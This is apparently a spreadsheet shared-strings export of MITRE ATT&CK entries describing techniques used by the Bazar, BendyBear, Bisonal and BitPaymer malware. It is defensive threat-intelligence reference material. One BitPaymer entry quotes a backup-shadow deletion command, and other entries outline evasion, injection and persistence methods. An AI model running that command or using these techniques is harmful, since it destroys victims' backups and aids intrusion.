    <t>relationship--2296f1da-0910-46ee-81f7-5d10cb8753cd</t>
  </si>
  <si>
    <t>28 March 2021</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534)'s loader can delete scheduled tasks created by a previous instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--50d9747b-7dee-4daf-8611-b4190ecd7e35</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--b8dc82ba-2bd6-4299-bf36-9d5968810663</t>
  </si>
  <si>
    <t>18 November 2020</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can retrieve information from the infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--602a4664-e89c-4c11-982d-699589853ab3</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can decrypt downloaded payloads. [Bazar](https://attack.mitre.org/software/S0534) also resolves strings and other artifacts at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--d9e7b8b3-6275-4c26-b9d2-4adfa1143c1b</t>
  </si>
  <si>
    <t xml:space="preserve">[Bazar](https://attack.mitre.org/software/S0534) has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.(Citation: NCC Group Team9 June 2020)	</t>
  </si>
  <si>
    <t>relationship--532db73a-7b3e-44a5-9115-6c366766a756</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to identify domain administrator accounts.(Citation: NCC Group Team9 June 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--1685aa0e-d1be-40ea-ade0-21ff64e0d372</t>
  </si>
  <si>
    <t>01 December 2020</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can implement DGA using the current date as a seed variable.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--fbc1faff-226a-4ea3-a08a-81b64066496d</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use [Nltest](https://attack.mitre.org/software/S0359) tools to obtain information about the domain.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--120f001f-eb9c-4183-89f1-7c6e4bddc80c</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has used dual-extension executable files such as PreviewReport.DOC.exe.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--d667c620-28cb-4c86-83f7-33d6c154369c</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can hash then resolve API calls at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--671e9da1-ef79-4193-88e2-fb406304ccea</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to use an alternative C2 server if the primary server fails.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--c1d43be1-daea-4cdd-9632-e0a22f4d9073</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can delete its loader using a batch file in the Windows temporary folder.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--bf61da0b-036b-4e51-894f-71a73689cff4</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate the victim's desktop.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--0a2c9965-291c-4724-829b-3cd5e8b26b58</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</si>
  <si>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</si>
  <si>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relationship--c646d6ed-e0f6-48b0-a4a3-d52b0a21f250</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify administrator accounts on an infected host.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--cc81f8f0-111c-4932-bc75-7704eaf17f73</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--17e7193e-6583-4bae-8a17-de75f006cd36</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a task named to appear benign.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--9c2766b3-87ff-4ec7-9ff4-faa3d4572eb4</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has named malicious shortcuts "adobe" and mimicked communications software.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--78ba82a1-e803-42c1-b112-ce999369d348</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader is used to download and execute the [Bazar](https://attack.mitre.org/software/S0534) backdoor.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--711879b6-a9ac-42c6-a6a0-244b03890cec</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use various APIs to allocate memory and facilitate code execution/injection.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--ea40d7a0-bb12-4ed1-a5bd-efdc6bdad4b2</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate shared drives on the domain.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--203108df-424d-4dfe-ac45-3cbd84c71615</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has used XOR, RSA2, and RC4 encrypted files.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--2e0eb5e4-37a3-435d-bdac-01f72b8cec4c</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a PowerShell script received from C2.(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--2cd5235f-1f0b-4f58-a931-d3b940b62cbf</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identity the current process on a compromised host.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--6e6f67c0-ba84-48f2-a322-2a7cb7a5cd02</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process using process doppelgänging.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--506751ad-9b0d-4dc5-a6a5-b25521e66a1a</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process including Svchost, Explorer, and cmd using process hollowing.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--ea187577-25ce-458f-a26b-9ee71d3879fd</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject code through calling &lt;code&gt;VirtualAllocExNuma&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--227624a1-7dda-4691-89b3-49336aa68bfa</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query &lt;code&gt;Windows\CurrentVersion\Uninstall&lt;/code&gt; for installed applications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--75a3cfad-a9e7-453f-88b8-787304575a33</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create or add files to Registry Run Keys to establish persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--f373c8d3-3182-4977-b333-87493458d340</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate remote systems using &lt;code&gt; Net View&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--16d19ac1-de53-44e2-9139-32b0e0525b0c</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a scheduled task for persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--cff83f53-0e10-4e98-9e2e-2a4b7d027d70</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the installed antivirus engine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--2fdc9078-0737-4b2c-bb6c-f046b63c368b</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can establish persistence by writing shortcuts to the Windows Startup folder.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--ed61e0a2-f6a7-43b1-b58e-aa0ab9c51c4e</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query the Registry for installed applications.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--794403a3-232e-4cc3-85e2-cc997825dfa8</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has a variant with a packed payload.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--f8f63dca-91a1-4bbf-811c-4ed083b36246</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been spread via emails with embedded malicious links.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--c36deed2-7da5-4c41-b6f0-eebc94bb17e9</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can send C2 communications with XOR encryption.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--7a41dd37-a5a0-4469-9ed9-74eb8ac57af3</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</si>
  <si>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</si>
  <si>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relationship--f6f600fd-796d-4f1f-b2c6-0ca283b2cdb1</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--682dad6a-277f-46ae-8416-cba070ff5738</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the IP address and NetBIOS name of an infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--9d4f2e79-594d-45b9-86d7-9dcc640ad9f1</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the username of the infected user.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--b609347d-0089-4021-86a6-706ef1abc95e</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the time on the compromised host.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--6d9f427b-f016-4100-a30a-c13648536e81</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use a timer to delay execution of core functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>relationship--adbee939-28b3-4932-9e8d-992b7fdca835</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can attempt to overload sandbox analysis by sending 1550 calls to &lt;code&gt;printf&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>relationship--4d63c2b7-03e6-4747-81f2-9197faccd5fc</t>
  </si>
  <si>
    <t>20 November 2020</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c2e67b83-b3c3-4db4-a18e-74f1cf005132</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) downloads have been hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--d5f0ff09-374d-45f6-b7d8-45466bf0ecf0</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can launch cmd.exe to perform reconnaissance commands.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--26f6de28-984d-4f79-9806-c13fe9e1f42d</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a WMI query to gather information about the installed antivirus engine.(Citation: Cybereason Bazar July 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--e3cd7b09-c244-4b5e-9a99-f1431489ed49</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use Winlogon Helper DLL to establish persistence.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--8dd22b15-a9bb-4acc-8fac-e366756ab50b</t>
  </si>
  <si>
    <t>S0574</t>
  </si>
  <si>
    <t>BendyBear</t>
  </si>
  <si>
    <t>malware--805480f1-6caa-4a67-8ca9-b2b39650d986</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has decrypted function blocks using a XOR key during runtime to evade detection.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--045da2d4-f599-447b-931b-c11e8692fa1c</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is designed to download an implant from a C2 server.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--0f55c28a-835f-4a85-a733-8fac5b819dcf</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used byte randomization to obscure its behavior.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--36855997-d730-48c6-bd43-7896c741cd6e</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--a33dbef1-994b-4dec-accb-6e63e9858f3e</t>
  </si>
  <si>
    <t>17 February 2021</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used a custom RC4 and XOR encrypted protocol over port 443 for C2.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--730a735c-1008-490e-b0c8-6938b858b28a</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has encrypted payloads using RC4 and XOR.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--9d0eda8b-7696-4b22-a31e-6761e42bc2ae</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can query the host's Registry key at &lt;code&gt;HKEY_CURRENT_USER\Console\QuickEdit&lt;/code&gt; to retrieve data.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>relationship--9753bc87-1ed3-4a28-a9d3-80e004d83e62</t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t>relationship--96fad0c2-f880-4fab-8aee-5573e1737dd8</t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) has the ability to determine local time on a compromised host.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t>relationship--c8a023b1-b472-40fc-98be-5709180e2628</t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) can check for analysis environments and signs of debugging using the Windows API &lt;code&gt;kernel32!GetTickCountKernel32&lt;/code&gt; call.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t>relationship--141036b9-327f-4b13-a561-856697dd138b</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been loaded through a `.wll` extension added to the ` %APPDATA%\microsoft\word\startup\` repository.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--40dc38ff-1daf-4c3b-823d-377ae4d3a505</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has appended random binary data to the end of itself to generate a large binary.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--930e0ad7-c430-41d1-bea2-5d08cd2ffa3d</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has collected information from a compromised host.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--84ad3033-c9b4-4679-94b2-0c2a2d9d15df</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has decoded strings in the malware using XOR and RC4.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--49f9b769-57d1-4d73-8194-59b584a72c1b</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used a dynamic DNS service for C2.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--e101388f-ea73-4d02-b07f-c89a17dfa4a5</t>
  </si>
  <si>
    <t>26 January 2022</t>
  </si>
  <si>
    <t xml:space="preserve"> [Bisonal](https://attack.mitre.org/software/S0268) has added the exfiltrated data to the URL over the C2 channel.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--b16afb1a-b6ee-4cfb-9fb1-966478828480</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) will delete its dropper and VBS scripts from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--152f2412-dbba-48b7-bbe9-612798f3ac23</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) can retrieve a file listing from the system.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--6ec66973-8ba0-4ec4-a4ca-c49a304f56b7</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has the capability to download files to execute on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--1b95cd32-155b-488d-bbf8-e16f22e2a1d5</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--91bd508e-7f5a-4514-b886-95d97f8eefff</t>
  </si>
  <si>
    <t xml:space="preserve"> [Bisonal](https://attack.mitre.org/software/S0268) dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--e9ddb0b6-298e-4061-b194-c9ea5d49c6d0</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has deleted Registry keys to clean up its prior activity.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--8edfde6c-1ede-41eb-bc84-0d98fe24bebd</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used the Windows API to communicate with the Service Control Manager to execute a thread.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--06808653-60ba-430a-8c37-b3b49d740578</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used raw sockets for network communication.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--b499e6f7-77bc-422b-b7ef-058d223a69e6</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--62e35388-0f7d-4434-af87-6f6c09a1a12b</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can obtain a list of running processes on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--1b03ba23-cbf3-4a77-8c8b-233a19e42a0c</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has supported use of a proxy server.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--c8df91dd-3060-4829-93a2-121b85b6c49b</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used the RegQueryValueExA function to retrieve proxy information in the Registry.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--a455cf4b-2402-4b72-a5e8-e5f5ed6d2bfc</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has added itself to the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; for persistence.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--7b909310-43e8-4870-ab62-d6078f27a785</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</si>
  <si>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</si>
  <si>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relationship--9088b52e-8e07-4fd4-ac80-66df7f877adf</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has used the MPRESS packer and similar tools for obfuscation.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--afe14ecc-81be-4724-aea6-cc1266425d1a</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been delivered as malicious email attachments.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--9acd37b4-5729-4c70-b943-d95dc0882cb8</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has encoded binary data with Base64 and ASCII.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--9e472909-7f89-430f-8782-8bf20ef265d4</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</si>
  <si>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</si>
  <si>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relationship--180f0c7c-c7bb-4131-b831-f406ee0516e2</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used commands and API calls to gather system information.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--ced766d2-ca63-43d2-8551-76f37696cc88</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) can execute &lt;code&gt;ipconfig&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--e4e9f93d-ae64-4f75-b12b-acbb45c31c41</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can check the system time set on the infected host.(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t>relationship--e7622538-5858-4804-960e-e9ef427a1a43</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--88a798b0-0820-4a6e-a9b2-416c84f3b357</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can check to determine if the compromised system is running on VMware.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--20dfecf8-b324-4584-9526-9de6a14dfa27</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268)'s dropper creates VBS scripts on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--4806e7c3-c8df-477f-ac3b-819248878a79</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t>relationship--895fbe96-6990-4ebd-a192-1653eb31a1ba</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>relationship--ca3f0924-306a-409e-a1b6-135b781f3dbf</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been modified to be used as a Windows service.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--408183ae-ffff-4341-8c90-f007226656aa</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</si>
  <si>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</si>
  <si>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relationship--a1862cc9-ba25-4d48-b2d5-55781dd1fa3e</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending &lt;code&gt;.locked&lt;/code&gt; to the filename.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--4c8da471-3483-4f75-8e1a-952d2d05454d</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) compares file names and paths to a list of excluded names and directory names during encryption.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--1cc1c2b0-5fb8-420e-8285-db4616a9fab2</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) attempts to remove the backup shadow files from the host using &lt;code&gt;vssadmin.exe Delete Shadows /All /Quiet&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--833e14f8-0f37-488a-a67c-3ff2fe524ac3</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate the sessions for each user logged onto the infected host.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--d17ee0b3-4f2b-4d6f-ae10-7934d4e9126d</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can set values in the Registry to help in execution.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>relationship--e811f6e8-a736-4bb8-8cd9-c6edc9a7ebd8</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has copied itself to the &lt;code&gt;:bin&lt;/code&gt; alternate data stream of a newly created file.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--c42f802b-394c-4d6f-bc3f-bf039c971cae</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used dynamic API resolution to avoid identifiable strings within the binary, including &lt;code&gt;RegEnumKeyW&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--f66247c0-1d4b-475b-8336-04530edb1455</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can search for network shares on the domain or workgroup using &lt;code&gt;net view &lt;host&gt;&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--6743c3f6-7f4f-40b3-bc9e-fe488f81f5e1</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--54f9c8a5-0677-4be8-bd72-a6a096be00bd</t>
  </si>
  <si>
